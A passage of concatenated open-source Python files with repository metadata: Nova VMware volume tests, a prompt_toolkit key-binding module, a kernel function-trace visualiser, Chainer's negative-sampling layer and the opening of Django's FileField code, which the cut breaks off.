iscsi_get_target.return_value = (device_name, disk_uuid)
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
device = mock.sentinel.device
get_rdm_disk.return_value = device
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self._volumeops._detach_volume_iscsi(connection_info, instance)
get_vm_ref.assert_called_once_with(session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_rdm_disk.assert_called_once_with(hardware_devices, disk_uuid)
detach_disk_from_vm.assert_called_once_with(
vm_ref, instance, device, destroy_disk=True)
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
def test_detach_volume_iscsi_with_missing_iscsi_target(
self, iscsi_get_target, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
iscsi_get_target.return_value = (None, None)
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self.assertRaises(
exception.StorageError, self._volumeops._detach_volume_iscsi,
connection_info, instance)
get_vm_ref.assert_called_once_with(self._volumeops._session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(vm_util, 'get_rdm_disk')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
def test_detach_volume_iscsi_with_missing_disk_device(
self, detach_disk_from_vm, iscsi_get_target,
get_rdm_disk, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
device_name = mock.sentinel.device_name
disk_uuid = mock.sentinel.disk_uuid
iscsi_get_target.return_value = (device_name, disk_uuid)
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
get_rdm_disk.return_value = None
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self.assertRaises(
exception.DiskNotFound, self._volumeops._detach_volume_iscsi,
connection_info, instance)
get_vm_ref.assert_called_once_with(session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_rdm_disk.assert_called_once_with(hardware_devices, disk_uuid)
self.assertFalse(detach_disk_from_vm.called)
def _test_attach_volume_vmdk(self, adapter_type=None):
connection_info = {'driver_volume_type': constants.DISK_FORMAT_VMDK,
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
vm_ref = 'fake-vm-ref'
volume_device = mock.MagicMock()
volume_device.backing.fileName = 'fake-path'
default_adapter_type = constants.DEFAULT_ADAPTER_TYPE
disk_type = constants.DEFAULT_DISK_TYPE
disk_uuid = 'e97f357b-331e-4ad1-b726-89be048fb811'
backing = mock.Mock(uuid=disk_uuid)
device = mock.Mock(backing=backing)
vmdk_info = vm_util.VmdkInfo('fake-path', default_adapter_type,
disk_type, 1024,
device)
adapter_type = adapter_type or default_adapter_type
if adapter_type == constants.ADAPTER_TYPE_IDE:
vm_state = power_state.SHUTDOWN
else:
vm_state = power_state.RUNNING
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(self._volumeops, 'attach_disk_to_vm'),
mock.patch.object(self._volumeops, '_update_volume_details'),
mock.patch.object(vm_util, 'get_vm_state',
return_value=vm_state)
) as (get_vm_ref, get_volume_ref, get_vmdk_info, attach_disk_to_vm,
update_volume_details, get_vm_state):
self._volumeops.attach_volume(connection_info, self._instance,
adapter_type)
get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
self.assertTrue(get_vmdk_info.called)
attach_disk_to_vm.assert_called_once_with(
vm_ref, self._instance, adapter_type,
constants.DISK_TYPE_PREALLOCATED, vmdk_path='fake-path')
update_volume_details.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'], disk_uuid)
if adapter_type == constants.ADAPTER_TYPE_IDE:
get_vm_state.assert_called_once_with(self._volumeops._session,
self._instance)
else:
self.assertFalse(get_vm_state.called)
def _test_attach_volume_iscsi(self, adapter_type=None):
connection_info = {'driver_volume_type': constants.DISK_FORMAT_ISCSI,
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
vm_ref = 'fake-vm-ref'
default_adapter_type = constants.DEFAULT_ADAPTER_TYPE
adapter_type = adapter_type or default_adapter_type
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_iscsi_discover_target',
return_value=(mock.sentinel.device_name,
mock.sentinel.uuid)),
mock.patch.object(vm_util, 'get_scsi_adapter_type',
return_value=adapter_type),
mock.patch.object(self._volumeops, 'attach_disk_to_vm')
) as (get_vm_ref, iscsi_discover_target, get_scsi_adapter_type,
attach_disk_to_vm):
self._volumeops.attach_volume(connection_info, self._instance,
adapter_type)
get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
iscsi_discover_target.assert_called_once_with(
connection_info['data'])
if adapter_type is None:
self.assertTrue(get_scsi_adapter_type.called)
attach_disk_to_vm.assert_called_once_with(vm_ref,
self._instance, adapter_type, 'rdmp',
device_name=mock.sentinel.device_name)
def test_attach_volume_vmdk(self):
for adapter_type in (None, constants.DEFAULT_ADAPTER_TYPE,
constants.ADAPTER_TYPE_BUSLOGIC,
constants.ADAPTER_TYPE_IDE,
constants.ADAPTER_TYPE_LSILOGICSAS,
constants.ADAPTER_TYPE_PARAVIRTUAL):
self._test_attach_volume_vmdk(adapter_type)
def test_attach_volume_iscsi(self):
for adapter_type in (None, constants.DEFAULT_ADAPTER_TYPE,
constants.ADAPTER_TYPE_BUSLOGIC,
constants.ADAPTER_TYPE_LSILOGICSAS,
constants.ADAPTER_TYPE_PARAVIRTUAL):
self._test_attach_volume_iscsi(adapter_type)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
def test_consolidate_vmdk_volume_with_no_relocate(
self, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
device = mock.Mock(backing=backing)
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
self._volumeops._consolidate_vmdk_volume(self._instance, vm_ref,
device, volume_ref)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
self.assertFalse(relocate_vm.called)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_host_of_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_res_pool_of_host')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, 'attach_disk_to_vm')
def test_consolidate_vmdk_volume_with_relocate(
self, attach_disk_to_vm, detach_disk_from_vm, get_res_pool_of_host,
get_host_of_vm, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
new_file_name = mock.sentinel.new_file_name
datastore = mock.sentinel.datastore
new_backing = mock.Mock(fileName=new_file_name, datastore=datastore)
device = mock.Mock(backing=new_backing)
host = mock.sentinel.host
get_host_of_vm.return_value = host
rp = mock.sentinel.rp
get_res_pool_of_host.return_value = rp
detach_disk_from_vm.side_effect = [
oslo_vmw_exceptions.FileNotFoundException]
instance = self._instance
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
adapter_type = constants.ADAPTER_TYPE_BUSLOGIC
disk_type = constants.DISK_TYPE_EAGER_ZEROED_THICK
self._volumeops._consolidate_vmdk_volume(instance, vm_ref, device,
volume_ref, adapter_type,
disk_type)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
relocate_vm.assert_called_once_with(self._session,
volume_ref, rp, datastore, host)
detach_disk_from_vm.assert_called_once_with(
volume_ref, instance, original_device, destroy_disk=True)
attach_disk_to_vm.assert_called_once_with(
volume_ref, instance, adapter_type, disk_type,
vmdk_path=new_file_name)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_host_of_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_res_pool_of_host')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, 'attach_disk_to_vm')
def test_consolidate_vmdk_volume_with_missing_vmdk(
self, attach_disk_to_vm, detach_disk_from_vm, get_res_pool_of_host,
get_host_of_vm, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
new_file_name = mock.sentinel.new_file_name
datastore = mock.sentinel.datastore
new_backing = mock.Mock(fileName=new_file_name, datastore=datastore)
device = mock.Mock(backing=new_backing)
host = mock.sentinel.host
get_host_of_vm.return_value = host
rp = mock.sentinel.rp
get_res_pool_of_host.return_value = rp
relocate_vm.side_effect = [
oslo_vmw_exceptions.FileNotFoundException, None]
instance = mock.sentinel.instance
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
adapter_type = constants.ADAPTER_TYPE_BUSLOGIC
disk_type = constants.DISK_TYPE_EAGER_ZEROED_THICK
self._volumeops._consolidate_vmdk_volume(instance, vm_ref, device,
volume_ref, adapter_type,
disk_type)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
relocate_calls = [mock.call(self._session, volume_ref, rp, datastore,
host),
mock.call(self._session, volume_ref, rp, datastore,
host)]
self.assertEqual(relocate_calls, relocate_vm.call_args_list)
detach_disk_from_vm.assert_called_once_with(
volume_ref, instance, original_device)
attach_disk_to_vm.assert_called_once_with(
volume_ref, instance, adapter_type, disk_type,
vmdk_path=new_file_name)
def test_iscsi_get_host_iqn(self):
host_mor = mock.Mock()
iqn = 'iscsi-name'
hba = vmwareapi_fake.HostInternetScsiHba(iqn)
hbas = mock.MagicMock(HostHostBusAdapter=[hba])
with test.nested(
mock.patch.object(vm_util, 'get_host_ref_for_vm',
return_value=host_mor),
mock.patch.object(self._volumeops._session, '_call_method',
return_value=hbas)
) as (fake_get_host_ref_for_vm, fake_call_method):
result = self._volumeops._iscsi_get_host_iqn(self._instance)
fake_get_host_ref_for_vm.assert_called_once_with(
self._volumeops._session, self._instance)
fake_call_method.assert_called_once_with(vutil,
"get_object_property",
host_mor,
"config.storageDevice.hostBusAdapter")
self.assertEqual(iqn, result)
def test_iscsi_get_host_iqn_instance_not_found(self):
host_mor = mock.Mock()
iqn = 'iscsi-name'
hba = vmwareapi_fake.HostInternetScsiHba(iqn)
hbas = mock.MagicMock(HostHostBusAdapter=[hba])
with test.nested(
mock.patch.object(vm_util, 'get_host_ref_for_vm',
side_effect=exception.InstanceNotFound('fake')),
mock.patch.object(vm_util, 'get_host_ref',
return_value=host_mor),
mock.patch.object(self._volumeops._session, '_call_method',
return_value=hbas)
) as (fake_get_host_ref_for_vm,
fake_get_host_ref,
fake_call_method):
result = self._volumeops._iscsi_get_host_iqn(self._instance)
fake_get_host_ref_for_vm.assert_called_once_with(
self._volumeops._session, self._instance)
fake_get_host_ref.assert_called_once_with(
self._volumeops._session, self._volumeops._cluster)
fake_call_method.assert_called_once_with(vutil,
"get_object_property",
host_mor,
"config.storageDevice.hostBusAdapter")
self.assertEqual(iqn, result)
def test_get_volume_connector(self):
vm_id = 'fake-vm'
vm_ref = mock.MagicMock(value=vm_id)
iqn = 'iscsi-name'
host_ip = 'testhostname'
self.flags(host_ip=host_ip, group='vmware')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_iscsi_get_host_iqn',
return_value=iqn)
) as (fake_get_vm_ref, fake_iscsi_get_host_iqn):
connector = self._volumeops.get_volume_connector(self._instance)
fake_get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
fake_iscsi_get_host_iqn.assert_called_once_with(self._instance)
self.assertEqual(host_ip, connector['ip'])
self.assertEqual(host_ip, connector['host'])
self.assertEqual(iqn, connector['initiator'])
self.assertEqual(vm_id, connector['instance'])
| apache-2.0 |
m4yers/crutch | crutch/core/repl/keys.py | 1 | 2604 | # -*- coding: utf-8 -*-
# Copyright © 2017 Artyom Goncharov
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
from __future__ import print_function
from prompt_toolkit.key_binding.manager import KeyBindingManager
from prompt_toolkit.keys import Keys
def get_key_manager(set_long_options, get_long_options): #pragma: no cover
assert callable(set_long_options)
assert callable(get_long_options)
manager = KeyBindingManager(
enable_search=True,
enable_system_bindings=True,
enable_abort_and_exit_bindings=True)
@manager.registry.add_binding(Keys.F2)
def opt_help(event):
"""
When F2 has been pressed, fill in the "help" command.
"""
event.cli.current_buffer.insert_text("help")
@manager.registry.add_binding(Keys.F3)
def opt_set_options_length(_):
"""
Enable/Disable long option name suggestion.
"""
set_long_options(not get_long_options())
@manager.registry.add_binding(Keys.F10)
def opt_exit(_):
"""
When F10 has been pressed, quit.
"""
# Unused parameters for linter.
raise EOFError
@manager.registry.add_binding(Keys.ControlSpace)
def opt_auto_complete(event):
"""
Initialize autocompletion at cursor. If the autocompletion menu is not
showing, display it with the appropriate completions for the context. If
the menu is showing, select the next completion.
"""
buf = event.cli.current_buffer
if buf.complete_state:
buf.complete_next()
else:
event.cli.start_completion(select_first=False)
return manager
| mit |
eMarco/kernel_samsung_tuna | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <[email protected]>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulting trace is processed into a tree to produce a more human-readable
view of the call stack by drawing a textual but hierarchical tree of
calls. Only the functions' names and the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some time but not too much; the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not found
in any parent, then create it as a new child of root.
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
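# A raw function-tracer line looks roughly like this (hypothetical sample):
#   bash-4251  [001]  10152.583854: path_put <-path_walk
# The regex below captures the timestamp, the callee and the caller.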
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 |
umitanuki/chainer | chainer/functions/negative_sampling.py | 4 | 6735 | import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
from chainer.utils import walker_alias
class NegativeSampling(function.Function):
"""Implementation of negative sampling.
In natural language processing, especially language modeling, the size of the
vocabulary is very large.
Therefore, you need to spend a lot of time calculating the gradient of the
embedding matrix.
Instead, with the negative sampling trick, you only need to calculate the
gradient for a few sampled negative examples.
The objective function is below:
.. math::
f(x, p) = \log\sigma(x^\\top w_p) + \\
k E_{i \sim P(i)}[\log\sigma(- x^\\top w_i)],
where :math:`\sigma(\cdot)` is a sigmoid function, :math:`w_i` is the
weight vector for the word :math:`i`, and :math:`p` is a positive example.
It is approximated with :math:`k` examples :math:`N` sampled from
probability :math:`P(i)`, like this:
.. math::
f(x, p) \\approx \log\sigma(x^\\top w_p) + \\
\sum_{n \in N} \log\sigma(-x^\\top w_n).
Each sample of :math:`N` is drawn from the word distribution :math:`P(w)`.
This is calculated as :math:`P(w) = \\frac{1}{Z} c(w)^\\alpha`, where
:math:`c(w)` is the unigram count of the word :math:`w`, :math:`\\alpha` is
a hyper-parameter, and :math:`Z` is the normalization constant.
Args:
in_size (int): Dimension of input vectors.
counts (int list): Number of occurrences of each identifier.
sample_size (int): Number of negative samples.
power (float): Power factor :math:`\\alpha`.
See: `Distributed Representations of Words and Phrases and their\
Compositionality <http://arxiv.org/abs/1310.4546>`_
"""
parameter_names = ('W',)
gradient_names = ('gW',)
def __init__(self, in_size, counts, sample_size, power=0.75):
self.sample_size = sample_size
p = numpy.array(counts, numpy.float32)
p = numpy.power(p, p.dtype.type(power))
self.sampler = walker_alias.WalkerAlias(p)
vocab_size = len(counts)
self.W = numpy.zeros((vocab_size, in_size)).astype(numpy.float32)
self.gW = numpy.zeros_like(self.W)
def _make_samples(self, t):
if hasattr(self, 'samples'):
return self.samples
size = int(t.shape[0])
# first one is the positive, and others are sampled negatives
samples = self.sampler.sample((size, self.sample_size + 1))
if isinstance(samples, numpy.ndarray):
samples.T[0] = t
else:
cuda.elementwise(
'T t, int32 m', 'raw T s', 's[i * m] = t;',
'negative_sampling_assign'
)(t, self.sample_size + 1, samples)
self.samples = samples
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
x_type, t_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 2,
t_type.dtype == numpy.int32,
t_type.ndim == 1,
x_type.shape[0] == t_type.shape[0]
)
def to_gpu(self, device=None):
super(NegativeSampling, self).to_gpu(device)
self.sampler.to_gpu()
def to_cpu(self):
super(NegativeSampling, self).to_cpu()
self.sampler.to_cpu()
def forward_cpu(self, inputs):
x, t = inputs
self._make_samples(t)
loss = numpy.float32(0.0)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = self.W[k]
f = w.dot(ix)
f[0] *= -1 # positive sample
loss += numpy.sum(numpy.logaddexp(f, 0))
return numpy.array(loss, numpy.float32),
def forward_gpu(self, inputs):
x, t = inputs
n_in = x.shape[1]
self._make_samples(t)
self.wx = cuda.elementwise(
'raw T W, raw T x, S k, int32 c, int32 m', 'T wx',
'''
T f = 0;
for (int j = 0; j < c; ++j) {
f += x[(i / m) * c + j] * W[k * c + j];
}
wx = f;
''',
'negative_sampling_wx'
)(self.W, x, self.samples, n_in, self.sample_size + 1)
y = cuda.elementwise(
'T wx, int32 c, int32 m', 'T y',
'''
T f = wx;
if (i % m == 0) {
f = -f;
}
T loss;
if (f < 0) {
loss = __logf(1 + __expf(f));
} else {
loss = f + __logf(1 + __expf(-f));
}
y = loss;
''',
'negative_sampling_forward'
)(self.wx, n_in, self.sample_size + 1)
# TODO(okuta): merge elementwise
loss = cuda.cupy.sum(y)
return loss,
def backward_cpu(self, inputs, grads):
x, t = inputs
gloss, = grads
gx = numpy.zeros_like(x)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = self.W[k]
f = w.dot(ix)
# g == -y * gloss / (1 + exp(yf))
f[0] *= -1
g = gloss / (1 + numpy.exp(-f))
g[0] *= -1
gx[i] = g.dot(w)
for ik, ig in six.moves.zip(k, g):
self.gW[ik] += ig * ix
return gx, None
def backward_gpu(self, inputs, grads):
x, t = inputs
gloss, = grads
n_in = x.shape[1]
g = cuda.elementwise(
'T wx, raw T gloss, int32 m', 'T g',
'''
T y;
if (i % m == 0) {
y = 1;
} else {
y = -1;
}
g = -y * gloss[0] / (1.0f + __expf(wx * y));
''',
'negative_sampling_calculate_g'
)(self.wx, gloss, self.sample_size + 1)
gx = cuda.zeros_like(x)
cuda.elementwise(
'raw T g, raw T W, raw S k, int32 c, int32 m', 'T gx',
'''
int d = i / c;
T w = 0;
for (int j = 0; j < m; ++j) {
w += g[d * m + j] * W[k[d * m + j] * c + i % c];
}
gx = w;
''',
'negative_sampling_calculate_gx'
)(g, self.W, self.samples, n_in, self.sample_size + 1, gx)
cuda.elementwise(
'T g, raw T x, S k, int32 c, int32 m', 'raw T gW',
'''
T gi = g;
for (int j = 0; j < c; ++j) {
atomicAdd(&gW[k * c + j], gi * x[(i / m) * c + j]);
}
''',
'negative_sampling_calculate_gw'
)(g, x, self.samples, n_in, self.sample_size + 1, self.gW)
return gx, None
| mit |
alexallah/django | django/db/models/fields/files.py | 11 | 18028 | import datetime
import posixpath
from django import forms
from django.core import checks
from django.core.files.base import File
from django.core.files.images import ImageFile
from django.core.files.storage import default_storage
from django.core.validators import validate_image_file_extension
from django.db.models import signals
from django.db.models.fields import Field
from django.utils.translation import gettext_lazy as _
class FieldFile(File):
def __init__(self, instance, field, name):
super().__init__(None, name)
self.instance = instance
self.field = field
self.storage = field.storage
self._committed = True
def __eq__(self, other):
# Older code may be expecting FileField values to be simple strings.
# By overriding the == operator, it can remain backwards compatible.
if hasattr(other, 'name'):
return self.name == other.name
return self.name == other
def __hash__(self):
return hash(self.name)
# The standard File contains most of the necessary properties, but
# FieldFiles can be instantiated without a name, so that needs to
# be checked for here.
def _require_file(self):
if not self:
raise ValueError("The '%s' attribute has no file associated with it." % self.field.name)
def _get_file(self):
self._require_file()
if not hasattr(self, '_file') or self._file is None:
self._file = self.storage.open(self.name, 'rb')
return self._file
def _set_file(self, file):
self._file = file
def _del_file(self):
del self._file
file = property(_get_file, _set_file, _del_file)
@property
def path(self):
self._require_file()
return self.storage.path(self.name)
@property
def url(self):
self._require_file()
return self.storage.url(self.name)
@property
def size(self):
self._require_file()
if not self._committed:
return self.file.size
return self.storage.size(self.name)
def open(self, mode='rb'):
self._require_file()
if hasattr(self, '_file') and self._file is not None:
self.file.open(mode)
else:
self.file = self.storage.open(self.name, mode)
return self
# open() doesn't alter the file's contents, but it does reset the pointer
open.alters_data = True
# In addition to the standard File API, FieldFiles have extra methods
# to further manipulate the underlying file, as well as update the
# associated model instance.
def save(self, name, content, save=True):
name = self.field.generate_filename(self.instance, name)
self.name = self.storage.save(name, content, max_length=self.field.max_length)
setattr(self.instance, self.field.name, self.name)
self._committed = True
# Save the object because it has changed, unless save is False
if save:
self.instance.save()
save.alters_data = True
def delete(self, save=True):
if not self:
return
# Only close the file if it's already open, which we know by the
# presence of self._file
if hasattr(self, '_file'):
self.close()
del self.file
self.storage.delete(self.name)
self.name = None
setattr(self.instance, self.field.name, self.name)
self._committed = False
if save:
self.instance.save()
delete.alters_data = True
@property
def closed(self):
file = getattr(self, '_file', None)
return file is None or file.closed
def close(self):
file = getattr(self, '_file', None)
if file is not None:
file.close()
def __getstate__(self):
# FieldFile needs access to its associated model field and an instance
# it's attached to in order to work properly, but the only necessary
# data to be pickled is the file's name itself. Everything else will
# be restored later, by FileDescriptor below.
return {'name': self.name, 'closed': False, '_committed': True, '_file': None}
class FileDescriptor:
"""
The descriptor for the file attribute on the model instance. Return a
FieldFile when accessed so you can write code like::
>>> from myapp.models import MyModel
>>> instance = MyModel.objects.get(pk=1)
>>> instance.file.size
Assign a file object on assignment so you can do::
>>> with open('/path/to/hello.world', 'r') as f:
... instance.file = File(f)
"""
def __init__(self, field):
self.field = field
def __get__(self, instance, cls=None):
if instance is None:
return self
# This is slightly complicated, so worth an explanation.
# `instance.file` needs to ultimately return some instance of `File`,
# probably a subclass. Additionally, this returned object needs to have
# the FieldFile API so that users can easily do things like
# instance.file.path and have that delegated to the file storage engine.
# Easy enough if we're strict about assignment in __set__, but if you
# peek below you can see that we're not. So depending on the current
# value of the field we have to dynamically construct some sort of
# "thing" to return.
# The instance dict contains whatever was originally assigned
# in __set__.
if self.field.name in instance.__dict__:
file = instance.__dict__[self.field.name]
else:
instance.refresh_from_db(fields=[self.field.name])
file = getattr(instance, self.field.name)
# If this value is a string (instance.file = "path/to/file") or None
# then we simply wrap it with the appropriate attribute class according
# to the file field. [This is FieldFile for FileFields and
# ImageFieldFile for ImageFields; it's also conceivable that user
# subclasses might also want to subclass the attribute class]. This
# object understands how to convert a path to a file, and also how to
# handle None.
if isinstance(file, str) or file is None:
attr = self.field.attr_class(instance, self.field, file)
instance.__dict__[self.field.name] = attr
# Other types of files may be assigned as well, but they need to have
# the FieldFile interface added to them. Thus, we wrap any other type of
# File inside a FieldFile (well, the field's attr_class, which is
# usually FieldFile).
elif isinstance(file, File) and not isinstance(file, FieldFile):
file_copy = self.field.attr_class(instance, self.field, file.name)
file_copy.file = file
file_copy._committed = False
instance.__dict__[self.field.name] = file_copy
# Finally, because of the (some would say boneheaded) way pickle works,
# the underlying FieldFile might not actually itself have an associated
# file. So we need to reset the details of the FieldFile in those cases.
elif isinstance(file, FieldFile) and not hasattr(file, 'field'):
file.instance = instance
file.field = self.field
file.storage = self.field.storage
# Make sure that the instance is correct.
elif isinstance(file, FieldFile) and instance is not file.instance:
file.instance = instance
# That was fun, wasn't it?
return instance.__dict__[self.field.name]
def __set__(self, instance, value):
instance.__dict__[self.field.name] = value
class FileField(Field):
# The class to wrap instance attributes in. Accessing the file object off
# the instance will always return an instance of attr_class.
attr_class = FieldFile
# The descriptor to use for accessing the attribute off of the class.
descriptor_class = FileDescriptor
description = _("File")
def __init__(self, verbose_name=None, name=None, upload_to='', storage=None, **kwargs):
self._primary_key_set_explicitly = 'primary_key' in kwargs
self.storage = storage or default_storage
self.upload_to = upload_to
kwargs['max_length'] = kwargs.get('max_length', 100)
super().__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
errors.extend(self._check_primary_key())
errors.extend(self._check_upload_to())
return errors
def _check_primary_key(self):
if self._primary_key_set_explicitly:
return [
checks.Error(
"'primary_key' is not a valid argument for a %s." % self.__class__.__name__,
obj=self,
id='fields.E201',
)
]
else:
return []
def _check_upload_to(self):
if isinstance(self.upload_to, str) and self.upload_to.startswith('/'):
return [
checks.Error(
"%s's 'upload_to' argument must be a relative path, not an "
"absolute path." % self.__class__.__name__,
obj=self,
id='fields.E202',
hint='Remove the leading slash.',
)
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if kwargs.get("max_length") == 100:
del kwargs["max_length"]
kwargs['upload_to'] = self.upload_to
if self.storage is not default_storage:
kwargs['storage'] = self.storage
return name, path, args, kwargs
def get_internal_type(self):
return "FileField"
def get_prep_value(self, value):
value = super().get_prep_value(value)
# Need to convert File objects provided via a form to string for database insertion
if value is None:
return None
return str(value)
def pre_save(self, model_instance, add):
file = super().pre_save(model_instance, add)
if file and not file._committed:
# Commit the file to storage prior to saving the model
file.save(file.name, file.file, save=False)
return file
def contribute_to_class(self, cls, name, **kwargs):
super().contribute_to_class(cls, name, **kwargs)
setattr(cls, self.name, self.descriptor_class(self))
def generate_filename(self, instance, filename):
"""
Apply (if callable) or prepend (if a string) upload_to to the filename,
then delegate further processing of the name to the storage backend.
